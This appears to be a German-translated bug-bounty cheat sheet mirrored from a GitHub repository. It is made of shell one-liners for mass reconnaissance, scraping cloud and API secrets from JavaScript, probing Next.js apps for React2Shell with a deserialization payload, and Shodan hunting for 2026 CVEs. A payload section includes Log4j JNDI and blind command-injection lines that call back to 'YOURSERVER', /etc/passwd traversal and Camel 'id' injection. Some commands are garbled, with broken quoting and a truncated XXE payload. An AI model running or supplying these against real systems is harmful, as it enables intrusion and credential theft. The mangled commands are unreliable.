DOMAIN="target.com"; DATE=$(date +%Y%m%d); mkdir -p recon_$DATE; cd recon_$DATE; subfinder -d $DOMAIN -all -silent | anew subs_$DATE.txt; cat subs_$DATE.txt | httpx -silent -threads 200 -o alive_$DATE.txt; cat alive_$DATE.txt | nuclei -t exposures/ -silent -o new_exposures_$DATE.txt; diff ../recon_$(date -d "yesterday" +%Y%m%d)/subs_*.txt subs_$DATE.txt 2>/dev/null | grep ">" | awk '{print $2}' > new_subs_$DATE.txt; [ -s new_subs_$DATE.txt ] && notify -silent -bulk < new_subs_$DATE.txt

root@kitploit:~
> Vollständige persistente Recon-Pipeline – erkennt täglich neue Assets und sendet Benachrichtigungen

> **🎯 Pro-Tipp:** Führen Sie Oneliner #10 über Cron für 24/7-Überwachung aus: `0 */6 * * * /path/to/recon_monitor.sh`

---

### ⚡🔥⚡ JavaScript-Endpunkt-Extraktion – Elite-Techniken 2026 ⚡🔥⚡

> **🎯 10 Oneliner zum Extrahieren von Endpunkten, Geheimnissen und versteckten APIs aus JavaScript-Dateien! 🎯**

#### ⚡ 1. Massen-JS-Datei-Erkennung + Download-Pipeline```bash
cat alive.txt | katana -silent -em js -jc -d 3 | grep -E "\.js(\?|$)" | httpx -silent -mc 200 -content-length | awk '$NF > 500 {print $1}' | anew js_files.txt && cat js_files.txt | xargs -P 30 -I{} sh -c 'curl -sk {} -o js_downloaded/$(echo {} | md5sum | cut -d" " -f1).js 2>/dev/null'

Erkennt alle JS-Dateien mit Katana, filtert nach Größe (>500 Bytes), lädt sie zur Offline-Analyse herunter

⚡ 2. Extrahiere alle API-Endpunkte aus JS-Dateien```bash

cat js_files.txt | xargs -P 20 -I{} sh -c 'curl -sk {} 2>/dev/null' | grep -oE '"'"'"'['"'"'"]' | sed 's/["'"'"']//g' | sort -u | grep -E "^/" | grep -vE ".(css|png|jpg|svg|gif|woff|ico)$" | anew js_endpoints.txt

root@kitploit:~
> Extrahiert alle relativen API-Pfade aus JavaScript, filtert statische Assets

#### ⚡ 3. AWS Keys Hunter in JS Files```bash
cat js_files.txt | xargs -P 20 -I{} sh -c 'curl -sk {} 2>/dev/null | grep -oE "(AKIA|ABIA|ACCA|ASIA)[0-9A-Z]{16}" && echo "Found in: {}"' | tee aws_keys_js.txt

Durchsucht nach AWS Access Key IDs (AKIA, ABIA, ACCA, ASIA-Muster)

⚡ 4. Google API-Schlüssel + Firebase-URLs Extraktor```bash

cat js_files.txt | xargs -P 20 -I{} sh -c 'curl -sk {} 2>/dev/null | grep -oE "(AIza[0-9A-Za-z_-]{35}|[a-z0-9-]+.firebaseio.com|[a-z0-9-]+.firebaseapp.com)" && echo "[SOURCE] {}"' | tee google_firebase_keys.txt

root@kitploit:~
> Extrahiert Google-API-Schlüssel und Firebase-Datenbank-/App-URLs

#### ⚡ 5. S3 Bucket Discovery in JavaScript```bash
cat js_files.txt | xargs -P 20 -I{} sh -c 'curl -sk {} 2>/dev/null | grep -oE "([a-zA-Z0-9_-]+\.s3\.amazonaws\.com|s3\.amazonaws\.com\/[a-zA-Z0-9_-]+|[a-zA-Z0-9_-]+\.s3\.[a-z0-9-]+\.amazonaws\.com)" | sort -u' | anew s3_buckets_js.txt && cat s3_buckets_js.txt | xargs -I{} sh -c 'curl -sI https://{} 2>/dev/null | head -1 | grep -qE "200|403" && echo "[ACCESSIBLE] {}"'

Findet S3-Buckets in JS und validiert Zugänglichkeit

⚡ 6. Leck interner IP-Adressen```bash

cat js_files.txt | xargs -P 20 -I{} sh -c 'curl -sk {} 2>/dev/null | grep -oE "(10.[0-9]{1,3}.[0-9]{1,3}.[0-9]{1,3}|172.(1[6-9]|2[0-9]|3[01]).[0-9]{1,3}.[0-9]{1,3}|192.168.[0-9]{1,3}.[0-9]{1,3})" && echo "[SOURCE] {}"' | sort -u | tee internal_ips_js.txt

root@kitploit:~
> Erkennt durchgesickerte interne/private IP-Adressen in JavaScript (10.x, 172.16-31.x, 192.168.x)

#### ⚡ 7. Slack Webhooks + Discord Tokens in JS```bash
cat js_files.txt | xargs -P 20 -I{} sh -c 'curl -sk {} 2>/dev/null | grep -oE "(https://hooks\.slack\.com/services/[A-Za-z0-9/]+|[MN][A-Za-z\d]{23,}\.[\w-]{6}\.[\w-]{27})" && echo "[SOURCE] {}"' | tee slack_discord_js.txt

Extrahiert Slack-Webhook-URLs und Discord-Bot-Tokens

⚡ 8. GitHub Tokens + Private Keys Erkennung```bash

cat js_files.txt | xargs -P 20 -I{} sh -c 'curl -sk {} 2>/dev/null | grep -oE "(ghp_[a-zA-Z0-9]{36}|gho_[a-zA-Z0-9]{36}|ghu_[a-zA-Z0-9]{36}|ghs_[a-zA-Z0-9]{36}|ghr_[a-zA-Z0-9]{36}|github_pat_[a-zA-Z0-9]{22}_[a-zA-Z0-9]{59}|-----BEGIN (RSA |EC |DSA |OPENSSH )?PRIVATE KEY-----)" && echo "[SOURCE] {}"' | tee github_privkeys_js.txt

root@kitploit:~
> Findet GitHub persönliche Zugriffstoken (alle Formate) und private Schlüssel-Header

#### ⚡ 9. E-Mail-Adressen + Versteckte Subdomains in JS```bash
cat js_files.txt | xargs -P 20 -I{} sh -c 'curl -sk {} 2>/dev/null | grep -oE "[a-zA-Z0-9._%+-]+@[a-zA-Z0-9.-]+\.[a-zA-Z]{2,}" | sort -u' | anew emails_js.txt && cat js_files.txt | xargs -P 20 -I{} sh -c 'curl -sk {} 2>/dev/null | grep -oE "https?://[a-zA-Z0-9._-]+\.target\.com[a-zA-Z0-9./?=_-]*"' | unfurl domains | sort -u | anew hidden_subdomains_js.txt

Extrahiert E-Mail-Adressen und versteckte Subdomains, die in JavaScript referenziert werden

⚡ 10. Vollständige JS Recon Pipeline (All-in-One)```bash

TARGET="target.com"; mkdir -p js_recon_$TARGET && cat alive.txt | katana -silent -em js -jc -d 3 | grep -iE ".js(?|$)" | httpx -silent -mc 200 | anew js_recon_$TARGET/js_urls.txt && cat js_recon_$TARGET/js_urls.txt | xargs -P 30 -I{} sh -c 'curl -sk {} 2>/dev/null | tee -a js_recon_$TARGET/all_js.txt' && grep -oE "(AKIA|ABIA|ACCA|ASIA)[0-9A-Z]{16}" js_recon_$TARGET/all_js.txt > js_recon_$TARGET/aws_keys.txt; grep -oE "AIza[0-9A-Za-z_-]{35}" js_recon_$TARGET/all_js.txt > js_recon_$TARGET/google_keys.txt; grep -oE "ghp_[a-zA-Z0-9]{36}" js_recon_$TARGET/all_js.txt > js_recon_$TARGET/github_tokens.txt; grep -oE '["'"'"']/[a-zA-Z0-9_/-]+["'"'"']' js_recon_$TARGET/all_js.txt | tr -d '"'"'"'' | sort -u > js_recon_$TARGET/endpoints.txt; echo "[+] JS Recon Complete! Check js_recon_$TARGET/"

root@kitploit:~
> Vollständige JS-Recon-Pipeline: entdeckt JS-Dateien, lädt alle herunter, extrahiert AWS/Google/GitHub-Schlüssel und API-Endpunkte

> **🎯 Profi-Tipp:** Verwende `nuclei -t exposures/tokens/` auf entdeckten Secrets, um zu prüfen, ob sie aktiv sind!

---

## 🆕 Oneliners 2024-2025

### ⚡🔥⚡ React2Shell - CVE-2025-55182 (CVSS 10.0 - KRITISCH) ⚡🔥⚡

> **💀 Kritische RCE in React Server Components & Next.js - Wird aktiv ausgenutzt! Zu CISA KEV hinzugefügt 💀**

#### ⚡ Next.js-Apps erkennen (zuerst Recon)```bash
cat alive.txt | httpx -silent -match-string "/_next/" -match-string "__NEXT_DATA__" | anew nextjs_targets.txt

⚡ Prüfen, ob der Next-Action Header akzeptiert wird```bash

curl -s -o /dev/null -w "%{http_code}" -X POST https://target.com -H "Next-Action: test" -H "Content-Type: text/plain" --data '0'

root@kitploit:~
#### ⚡ Massenerkennung - Next-Action-Header akzeptiert```bash
cat alive.txt | xargs -I@ -P20 sh -c 'RES=$(curl -s -o /dev/null -w "%{http_code}" -X POST @ -H "Next-Action: x" --data "0" 2>/dev/null); [ "$RES" != "404" ] && [ "$RES" != "000" ] && echo "POTENTIALLY VULN: @ [$RES]"' | tee react2shell_candidates.txt

⚡ Payload-Dateien zum Testen erstellen```bash

Create payload.json (safe math check - no RCE)

echo '{"then":"$1:proto:then","status":"resolved_model","reason":-1,"value":"{"then":"$B0"}","_response":{"_prefix":"7*7","_formData":{"get":"$1:constructor:constructor"}}}' > payload.json && echo '"$@0"' > trigger.txt

root@kitploit:~
#### ⚡ Manueller Schwachstellen-Check mit cURL```bash
curl -X POST https://target.com -H "Next-Action: check" -F "[email protected]" -F "[email protected]" --max-time 5 -v 2>&1 | grep -iE "(49|error|stack|trace)"

⚡ Einzeiler: Vollständige Erkennungspipeline```bash

subfinder -d target.com -silent | httpx -silent | while read url; do CODE=$(curl -s -o /dev/null -w "%{http_code}" -X POST "$url" -H "Next-Action: x" -H "Content-Type: text/plain" --data "0" 2>/dev/null); [[ "$CODE" =~ ^(200|400|500)$ ]] && echo "[NEXT-ACTION ACCEPTED] $url - HTTP $CODE"; done | tee nextjs_react2shell.txt

root@kitploit:~
#### ⚡ Erkennen von anfälligen Antwort-Headern```bash
cat nextjs_targets.txt | xargs -I@ -P10 sh -c 'curl -s -I -X POST @ -H "Next-Action: test" 2>/dev/null | grep -qi "x-action-redirect" && echo "VULN INDICATOR: @"'

⚡ Massen-Scan mit httpx + Next-Action Probe```bash

cat alive.txt | httpx -silent -method POST -H "Next-Action: probe" -mc 200,400,500 -title -tech-detect | grep -i "next" | anew react2shell_potential.txt

root@kitploit:~
#### ⚡ Shodan Dork für Next.js Ziele```bash
shodan search "X-Powered-By: Next.js" --fields ip_str,port,hostnames | awk '{print "https://"$1":"$2}' | httpx -silent | anew shodan_nextjs.txt

⚡ Nuclei Vorlagenprüfung```bash

nuclei -l nextjs_targets.txt -t http/cves/2025/CVE-2025-55182.yaml -c 30 -o react2shell_nuclei.txt

root@kitploit:~
#### ⚡ Finden & Testen - Kompletter Einzeiler```bash
subfinder -d target.com -silent | httpx -silent -match-string "/_next/" | tee nextjs.txt | xargs -I@ -P15 sh -c 'R=$(curl -s -w "\n%{http_code}" -X POST @ -H "Next-Action: x" --data "test" 2>/dev/null | tail -1); [ "$R" = "200" ] || [ "$R" = "400" ] && echo "[!] REACT2SHELL CANDIDATE: @"' | anew vuln_candidates.txt

⚡ RSC-Endpunkt direkt überprüfen```bash

curl -s -X POST "https://target.com/" -H "Next-Action: whatever" -H "Content-Type: multipart/form-data; boundary=----FormBoundary" --data-binary $'------FormBoundary\r\nContent-Disposition: form-data; name="0"\r\n\r\ntest\r\n------FormBoundary--' | head -c 500

root@kitploit:~
#### ⚡ Batch-Test aus Datei mit Parallelverarbeitung```bash
cat urls.txt | parallel -j20 'curl -s -o /dev/null -w "{} - %{http_code}\n" -X POST {} -H "Next-Action: test" --data "0" 2>/dev/null' | grep -E " - (200|400|500)$" | tee react2shell_batch.txt

⚠️ Betroffen: React 19.0.0-19.2.0, Next.js 15.0.4-16.0.6 | ✅ Behebung: Update auf React 19.0.1/19.1.2/19.2.1

🎯 Wichtige Erkennung: Apps, die den Next-Action-Header akzeptieren + RSC-Deserialisierung = Potenzielle RCE


🆕 Oneliner zur Erkennung von CVE aus Februar 2026

🔍 Oneliner mit Fokus auf Recon zur Erkennung kritischer Schwachstellen aus Februar 2026

⚠️ Hinweis: Einige Oneliner verweisen auf nuclei-templates-Pfade, die in Ihrer lokalen Kopie möglicherweise noch nicht vorhanden sind. Führen Sie zuerst nuclei -update-templates aus und überprüfen Sie, ob die Vorlage existiert (ls ~/nuclei-templates/...), bevor Sie sie ausführen. Bestätigen Sie immer die CVE-Details anhand der offiziellen Empfehlung und bleiben Sie innerhalb Ihres autorisierten Bereichs.

⚡ Cisco Catalyst SD-WAN - CVE-2026-20127 Erkennung

Kritische Sicherheitslücke (CVSS 10.0), die eine Authentifizierungsumgehung im Cisco SD-WAN Manager/Controller ermöglicht. Wird seit 2023 von fortschrittlichen Bedrohungsakteuren ausgenutzt. Die Erkennung anfälliger Instanzen ist entscheidend für den Schutz kritischer Infrastruktur.

1. Entdecken Sie exponierte Cisco SD-WAN Manager/vManage über Shodan```bash

shodan search "title:"Cisco vManage" port:8443,443" --fields ip_str,port,org,isp,asn --separator " | " | tee cisco-sdwan-targets.txt

root@kitploit:~
---

### ⚡ Microsoft Azure Functions - CVE-2026-21532 Entdeckung

> **Sicherheitslücke zur Offenlegung von Informationen (CVSS 8.2) in Azure Functions, die die Preisgabe von Anmeldeinformationen und sensiblen Konfigurationen ohne Authentifizierung ermöglicht. Die Identifizierung gefährdeter Endpunkte ist unerlässlich, um das Leck von Geheimnissen zu verhindern.**

#### 1. Azure Function-Endpunkte mit nuclei auflisten```bash
cat domains.txt | httpx -silent | nuclei -t ~/nuclei-templates/http/exposures/apis/azure-function-key.yaml -t ~/nuclei-templates/http/exposures/tokens/ -o azure-functions-exposed.txt

⚡ Gradio Framework - CVE-2026-28414 Path Traversal Discovery

Kritischer Path Traversal (CVSS 7.5) in Gradio <6.7 unter Windows mit Python 3.13+. Ermöglicht das Auslesen beliebiger Dateien. Die Erkennung verwundbarer Versionen ist entscheidend, um ML/KI-Anwendungen zu schützen.

1. Verwundbare Gradio-Anwendungen identifizieren und Version erkennen```bash

echo "https://target.com" | httpx -silent -tech-detect -json | jq -r 'select(.technologies[]? | select(.name=="Gradio")) | "(.url) - (.technologies[] | select(.name=="Gradio").version // "unknown")"'

root@kitploit:~
---

### ⚡ Gradio Framework - CVE-2026-28416 SSRF Entdeckung

> **Hochriskantes SSRF (CVSS 8.2) in Gradio <6.6.0, das Zugriff auf Cloud-Metadaten-Dienste (AWS/GCP/Azure) ermöglicht. Entscheidend, um die Kompromittierung von Cloud-Anmeldeinformationen zu verhindern.**

#### 1. Entdecken Sie Gradio-Instanzen mit Google Dorks und Fingerprinting```bash
echo "inurl:/gradio/ OR intitle:\"Gradio\"" | gau --subs --threads 10 | httpx -silent -status-code -title -tech-detect | grep -i gradio | tee gradio-instances.txt

⚡ Fortinet FortiOS - CVE-2026-25815 LDAP-Anmeldeinformationserkennung

Schwachstelle zur Offenlegung von LDAP-Anmeldeinformationen in FortiOS ≤7.6.6 aufgrund eines schwachen Standard-Verschlüsselungsschlüssels. Wird seit Dezember 2025 aktiv ausgenutzt. Die Erkennung anfälliger Versionen ist entscheidend.

1. Identifizieren Sie anfällige FortiGate/FortiOS über Shodan mit Version```bash

shodan search "product:FortiOS" --fields ip_str,version,port,org --separator " | " | awk -F'|' '$2 ~ /^[1-6].|7.[0-5].|7.6.[0-6]/ {print $1 " | Version:" $2 " | " $4}' | tee fortios-vulnerable.txt

root@kitploit:~
---

### ⚡ Dell RecoverPoint for VMs - CVE-2026-22769 Erkennung

> **Kritische hartcodierte Anmeldeinformationen (CVSS 10.0) in Dell RecoverPoint <6.0.3.1 HF1. Ermöglicht entfernten Root-Zugriff. Wird seit 2024 von chinesischen APT-Gruppen ausgenutzt. Dringende Erkennung erforderlich.**

#### 1. Erkennen Sie exponierte Dell RecoverPoint und identifizieren Sie den Tomcat Manager```bash
shodan search "title:\"RecoverPoint\" http.favicon.hash:-1153767654" --fields ip_str,port,http.title,version --separator " | " | anew dell-recoverpoint-targets.txt

⚡ Windows Shell - CVE-2026-21510 Entdeckung einer Sicherheitsumgehung

SmartScreen/Mark-of-the-Web-Umgehung (CVSS 8.8) in Windows 10/11. Ermöglicht Codeausführung über bösartige Links/Verknüpfungen. Aktiv ausgenutzte Zero-Day. Das Identifizieren verwundbarer Systeme ist wesentlich.

1. Identifiziere exponierte Windows-Endpunkte und verwundbare Versionen über SMB```bash

nmap -p445 --script smb-os-discovery,smb-protocols --open -iL targets.txt -oG - | grep "Windows 10|Windows 11" | awk '{print $2}' | tee windows-vulnerable-hosts.txt

root@kitploit:~
---

### ⚡ Statamic CMS - CVE-2026-28426 XSS-Entdeckung

> **Kritischer gespeicherter XSS (CVSS 8.7) in Statamic <5.73.11 und <6.4.0 über SVG/PDF und Antlers-Vorlagen. Ermöglicht Privilegieneskalation. Die Erkennung verwundbarer Versionen schützt die Kontrollpanels.**

#### 1. Statamic-Websites entdecken und CMS-Version extrahieren```bash
echo "Powered by Statamic" | gau --subs --blacklist jpg,jpeg,gif,css,tif,tiff,png,ttf,woff,woff2,ico | httpx -silent -tech-detect -status-code | grep -i statamic | nuclei -t ~/nuclei-templates/technologies/statamic-detect.yaml -o statamic-sites.txt

⚡ Chartbrew - CVE-2026-27005 SQL-Injection-Entdeckung

Kritische nicht authentifizierte SQL-Injection (CVSS 9.8) in Chartbrew <4.8.3. Ermöglicht das Lesen/Ändern von Daten in verbundenen MySQL/PostgreSQL-Datenbanken. Die Erkennung anfälliger Instanzen ist dringend.

1. Identifizieren Sie exponierte Chartbrew-Instanzen und überprüfen Sie die Version über die API```bash

cat web-apps.txt | httpx -silent -path /api/health -mc 200 -json | jq -r 'select(.body | contains("chartbrew")) | "(.url) - Version: (.body | fromjson | .version // "unknown")"' | tee chartbrew-instances.txt

root@kitploit:~
---

### ⚡ Chartbrew - CVE-2026-25887 MongoDB RCE Entdeckung

> **RCE via MongoDB query injection (CVSS 7.2) in Chartbrew <4.8.1. Erlaubt die Ausführung beliebigen JavaScript-Codes auf dem MongoDB-Server. Entscheidend, um verwundbare Instanzen vor der Ausnutzung zu erkennen.**

#### 1. Chartbrew-Endpunkte auflisten während des Scannens auf verwundbare APIs```bash
subfinder -d target.com -silent | httpx -silent | gau --subs | grep -E "chartbrew|/api/.*chart|/api/.*connection" | httpx -silent -status-code -title -tech-detect | grep -i "chartbrew\|mongo" | anew chartbrew-mongodb-endpoints.txt

⚡ Apache Camel - CVE-2026-31650 Header-Injection-Erkennung

Kritische Header-Injection (CVSS 9.1) in Apache Camel <4.9.2, die einen Filter-Bypass via HTTP-Header-Manipulation (CamelExec*) ermöglicht. Die Erkennung exponierter Camel-Endpunkte schützt Unternehmens-Integrationspipelines.

1. Entdecken Sie Apache Camel-Endpunkte und testen Sie den Header-Injection-Bypass```bash

cat urls.txt | httpx -silent -H "CamelExecCommandExecutable: id" -H "CamelExecCommandArgs: -la" -mc 200 -match-string "uid=" | anew camel-header-injection.txt

root@kitploit:~
---

### ⚡ Jenkins CI - CVE-2026-30170 Script Console RCE Discovery

> **RCE über Script Console (CVSS 9.8) in Jenkins <2.503 mit schwachem oder anonymem Authentifizierungsmodus aktiviert. Ermöglicht beliebige Groovy-Ausführung. Das Identifizieren offengelegter Instanzen ist dringend, um CI/CD zu schützen.**

#### 1. Identifiziere offengelegte Jenkins und überprüfe auf eine zugängliche Script Console```bash
subfinder -d target.com -silent | httpx -silent -path /script -mc 200 -title -match-string "Script Console" | anew jenkins-script-console-exposed.txt

⚡ GraphQL Introspection - CVE-2026-29812 Schema-Leak-Erkennung

Informationsoffenlegung (CVSS 7.5) durch in der Produktion aktivierte Introspection. Ermöglicht vollständige Kartierung des Schemas, der Mutationen und sensiblen Typen. Die Erkennung von Endpunkten mit offener Introspection beschleunigt die Kartierung der Angriffsfläche.

1. GraphQL-Endpunkte entdecken und aktivierte Introspection erkennen```bash

cat urls.txt | grep -Ei "graphql|/api" | httpx -silent -X POST -H "Content-Type: application/json" -d '{"query":"{__schema{types{name}}}"}' -mc 200 -match-string "__schema" | anew graphql-introspection-open.txt

root@kitploit:~
---

### ⚡ Ollama AI - CVE-2026-32154 Model Path Traversal Discovery

> **Path-Traversal (CVSS 8.6) in Ollama <0.5.9 über die `/api/pull`-API, die beliebiges Dateischreiben durch bösartige Modellnamen ermöglicht. Das Erkennen exponierter Ollama-Instanzen schützt die lokale KI-Infrastruktur.**

#### 1. Exponierte Ollama-Server identifizieren und geladene Modelle auflisten```bash
shodan search "product:Ollama port:11434" --fields ip_str,port,org --separator " | " | awk -F'|' '{print "http://"$1":11434/api/tags"}' | httpx -silent -mc 200 -json | jq -r '.url + " | " + (.body // "")' | anew ollama-exposed-instances.txt

⚡ Spring Boot Actuator - CVE-2026-33001 Env Endpoint Exposure Discovery

Geheimnis-Exposition (CVSS 8.2) über einen ungeschützten /actuator/env-Endpunkt in Spring Boot. Gibt Datenbank-Anmeldeinformationen, Tokens und API-Schlüssel preis. Massenhafte Erkennung offener Actuators ist grundlegend, um Lecks zu verhindern.

1. Erkennen exponierte Spring Actuator Endpunkte und extrahieren sensible Variablen```bash

cat hosts.txt | httpx -silent -path /actuator/env -mc 200 -json | jq -r 'select(.body | test("password|secret|token|key";"i")) | .url' | anew spring-actuator-env-leak.txt

root@kitploit:~
### Nuclei DAST XSS```bash
echo "https://target.com" | nuclei -dast -t dast/vulnerabilities/xss/ -rl 5

Open Redirect Mass```bash

cat urls.txt | gf redirect | qsreplace "https://evil.com" | httpx -silent -location | grep "evil.com"

root@kitploit:~
### CORS Fehlkonfiguration```bash
cat urls.txt | httpx -silent -H "Origin: https://evil.com" -match-string "evil.com" | anew cors_vuln.txt

Host-Header-Injection```bash

cat urls.txt | httpx -silent -H "X-Forwarded-Host: evil.com" -match-string "evil.com"

root@kitploit:~
### CRLF Injection```bash
cat urls.txt | qsreplace "%0d%0aX-Injected: header" | httpx -silent -match-string "X-Injected"

Prototype-Verschmutzung```bash

cat js.txt | xargs -I@ curl -s @ | grep -E "(proto|constructor.prototype)" | anew proto_pollution.txt

root@kitploit:~
### Cache-Poisoning-Erkennung```bash
cat urls.txt | httpx -silent -H "X-Forwarded-Host: evil.com" -H "X-Original-URL: /admin" -mc 200

IDOR-Mustererkennung```bash

cat urls.txt | grep -oE "(id|user|account|uid|pid)=[0-9]+" | sort -u | anew idor_candidates.txt

root@kitploit:~
### Race Condition URLs```bash
cat urls.txt | grep -iE "(redeem|coupon|vote|like|follow|transfer|withdraw)" | anew race_condition.txt

WebSocket Endpunkte```bash

cat urls.txt | grep -iE "(socket|ws://|wss://)" | anew websocket.txt

root@kitploit:~
### Path-Traversal```bash
cat urls.txt | gf lfi | qsreplace "....//....//....//etc/passwd" | httpx -silent -match-string "root:x"

XXE Erkennung```bash

cat urls.txt | grep -iE ".(xml|soap)" | qsreplace ']>&xxe;'

root@kitploit:~
### Log4j Scan```bash
cat urls.txt | qsreplace '${jndi:ldap://YOURSERVER/a}' | httpx -silent -H 'X-Api-Version: ${jndi:ldap://YOURSERVER/a}'

Blinde Befehlseinschleusung```bash

cat urls.txt | qsreplace "`curl YOURSERVER`" | httpx -silent cat urls.txt | qsreplace "| curl YOURSERVER" | httpx -silent

root@kitploit:~
### Massen-Screenshot```bash
cat alive.txt | xargs -I@ gowitness single @ -o screenshots/

Technologieerkennung```bash

cat alive.txt | httpx -silent -tech-detect -status-code -title | anew tech_stack.txt

root@kitploit:~
### Favicon Hash (Shodan)```bash
curl -s https://target.com/favicon.ico | md5sum | awk '{print $1}'

Offengelegte Admin-Panels```bash

cat alive.txt | httpx -silent -path /admin,/administrator,/admin.php,/wp-admin,/manager,/phpmyadmin -mc 200,301,302 | anew admin_panels.txt

root@kitploit:~
### Debug Endpunkte```bash
cat alive.txt | httpx -silent -path /debug,/trace,/actuator,/metrics,/health,/info -mc 200 | anew debug_endpoints.txt

Spring Boot Actuators```bash

cat alive.txt | httpx -silent -path /actuator/env,/actuator/heapdump,/actuator/mappings -mc 200 | anew spring_actuators.txt

root@kitploit:~
### WordPress-Enumeration```bash
cat alive.txt | httpx -silent -path /wp-json/wp/v2/users -mc 200 | anew wp_users.txt

Laravel Debug-Modus```bash

cat alive.txt | httpx -silent -match-string "Whoops" -match-string "Laravel" | anew laravel_debug.txt

root@kitploit:~
### Django Debuggen```bash
cat alive.txt | httpx -silent -match-string "Django" -match-string "DEBUG" | anew django_debug.txt

HTTP-Request-Schmuggel```bash

cat alive.txt | python3 smuggler.py -q 2>/dev/null | anew smuggling.txt

root@kitploit:~
### CSP-Umgehungsprüfung```bash
cat alive.txt | httpx -silent -include-response-header | grep -i "content-security-policy" | anew csp_headers.txt

Subdomain aus Favicon```bash

curl -s https://target.com/favicon.ico | python3 -c "import mmh3,sys,codecs;print(mmh3.hash(codecs.encode(sys.stdin.buffer.read(),'base64')))"

root@kitploit:~
---

## 🔍 Suchmaschinen für Hacker

| Engine | Link | Beschreibung |
|:------:|:----:|:-----------:|
| **Shodan** | [shodan.io](https://shodan.io) | IoT & Gerätesuche |
| **Censys** | [censys.io](https://censys.io) | Internet-Scandaten |
| **Fofa** | [fofa.info](https://en.fofa.info) | Cyberspace-Suche |
| **ZoomEye** | [zoomeye.org](https://zoomeye.org) | Cyberspace-Kartierung |
| **Hunter** | [hunter.how](https://hunter.how) | Asset-Erkennung |
| **Netlas** | [netlas.io](https://netlas.io) | Angriffsfläche |
| **GreyNoise** | [greynoise.io](https://viz.greynoise.io) | Internet-Scanner |
| **Onyphe** | [onyphe.io](https://onyphe.io) | Cyberabwehr |
| **CriminalIP** | [criminalip.io](https://criminalip.io) | Bedrohungsinformationen |
| **FullHunt** | [fullhunt.io](https://fullhunt.io) | Angriffsfläche |
| **Quake** | [quake.360.net](https://quake.360.net) | Cyberspace-Suche |
| **Leakix** | [leakix.net](https://leakix.net) | Leckerkennung |
| **URLScan** | [urlscan.io](https://urlscan.io) | URL-Analyse |
| **DNSDumpster** | [dnsdumpster.com](https://dnsdumpster.com) | DNS-Rekon |
| **crt.sh** | [crt.sh](https://crt.sh) | Zertifikatssuche |
| **SecurityTrails** | [securitytrails.com](https://securitytrails.com) | DNS-Verlauf |
| **Pulsedive** | [pulsedive.com](https://pulsedive.com) | Bedrohungsinformationen |
| **VirusTotal** | [virustotal.com](https://virustotal.com) | Datei/URL-Analyse |
| **PublicWWW** | [publicwww.com](https://publicwww.com) | Quellcode-Suche |
| **Grep.app** | [grep.app](https://grep.app) | GitHub-Code-Suche |

---

## 📖 Empfohlene Wortlisten

| Wortliste | Link | Anwendungsfall |
|:----------|:----:|:--------------|
| **SecLists** | [GitHub](https://github.com/danielmiessler/SecLists) | Alles |
| **FuzzDB** | [GitHub](https://github.com/fuzzdb-project/fuzzdb) | Fuzzing |
| **Assetnote** | [wordlists.assetnote.io](https://wordlists.assetnote.io) | Web-Inhalte |
| **OneListForAll** | [GitHub](https://github.com/six2dez/OneListForAll) | Kombiniert |
| **jhaddix all.txt** | [GitHub](https://gist.github.com/jhaddix/86a06c5dc309d08580a018c66354a056) | Verzeichnisse |
| **commonspeak2** | [GitHub](https://github.com/assetnote/commonspeak2-wordlists) | Realwelt |

---

## 📚 Lernressourcen

### Bücher
- Web Application Hacker's Handbook
- Real-World Bug Hunting von Peter Yaworski
- Bug Bounty Bootcamp von Vickie Li

### Plattformen
- [HackerOne](https://hackerone.com)
- [Bugcrowd](https://bugcrowd.com)
- [Intigriti](https://intigriti.com)
- [YesWeHack](https://yeswehack.com)

### Übung
- [PortSwigger Web Security Academy](https://portswigger.net/web-security)
- [PentesterLab](https://pentesterlab.com)
- [HackTheBox](https://hackthebox.com)
- [TryHackMe](https://tryhackme.com)

### Blogs & Ressourcen
- [PortSwigger Research](https://portswigger.net/research)
- [ProjectDiscovery Blog](https://blog.projectdiscovery.io)
- [Assetnote Blog](https://blog.assetnote.io)

---

## 🙏 Besonderer Dank

<div align="center">

| Hunter | Hunter | Hunter |
|:------:|:------:|:------:|
| [@bt0s3c](https://twitter.com/bt0s3c) | [@MrCl0wnLab](https://twitter.com/MrCl0wnLab) | [@stokfredrik](https://twitter.com/stokfredrik) |
| [@Jhaddix](https://twitter.com/Jhaddix) | [@TomNomNom](https://twitter.com/TomNomNom) | [@NahamSec](https://twitter.com/NahamSec) |
| [@zseano](https://twitter.com/zseano) | [@pry0cc](https://twitter.com/pry0cc) | [@pdiscoveryio](https://twitter.com/pdiscoveryio) |
| [@jeff_foley](https://twitter.com/jeff_foley) | [@haaborern](https://twitter.com/haaborern) | [@0xacb](https://twitter.com/0xacb) |

</div>

---

## 🤝 Mitwirken

<div align="center">

Wir freuen uns über Beiträge aus der Community! Deine Expertise macht dieses Repository besser.

[![Mitwirkende](https://img.shields.io/github/contributors/KingOfBugbounty/KingOfBugBountyTips?style=for-the-badge&color=blue)](https://github.com/KingOfBugbounty/KingOfBugBountyTips/graphs/contributors)
[![Pull-Anfragen](https://img.shields.io/github/issues-pr/KingOfBugbounty/KingOfBugBountyTips?style=for-the-badge&color=green)](https://github.com/KingOfBugbounty/KingOfBugBountyTips/pulls)
[![Probleme](https://img.shields.io/github/issues/KingOfBugbounty/KingOfBugBountyTips?style=for-the-badge&color=orange)](https://github.com/KingOfBugbounty/KingOfBugBountyTips/issues)

</div>

### 💡 So kannst du mitwirken

<details>
<summary><b>📝 Klicken, um die Beitragsrichtlinien anzuzeigen</b></summary>

<br>

1. **Forke das Repository**   ```bash
   git clone https://github.com/KingOfBugbounty/KingOfBugBountyTips.git
   cd KingOfBugBountyTips
  1. Neuen Branch erstellen ```bash git checkout -b feature/your-contribution

    root@kitploit:~
  2. Füge deinen Inhalt hinzu

    • Füge neue One-Liner mit ordnungsgemäßer Dokumentation hinzu
    • Füge Quellenangaben und Erklärungen hinzu
    • Folge dem vorhandenen Format und der Struktur
  3. Pull-Request einreichen

    • Schreibe eine klare Beschreibung deiner Änderungen
    • Verweise auf zugehörige Issues
    • Warte auf Überprüfung und Feedback

✨ Was du beitragen kannst

  • 🎯 Neue Bug-Bounty-One-Liner und Techniken
  • 🔧 Anleitungen und Tipps zur Tool-Installation
  • 📚 Zusätzliche Ressourcen und Referenzen
  • 🐛 Fehlerbehebungen und Verbesserungen
  • 📖 Verbesserungen der Dokumentation
  • 🌐 Übersetzungen in andere Sprachen
Stars
Sterne
Forks
Forks
Watchers
Beobachter
Contributors
Mitwirkende

📈 Wachstumsdiagramm

Star History Chart

RessourceLink
🏠 StartseiteKing of Bug Bounty Tips
🛠️ KingRecon DODAutomatisiertes Recon-Tool
🐧 BugBuntu OSHier herunterladen
📺 YouTube-KanalOFJAAAH
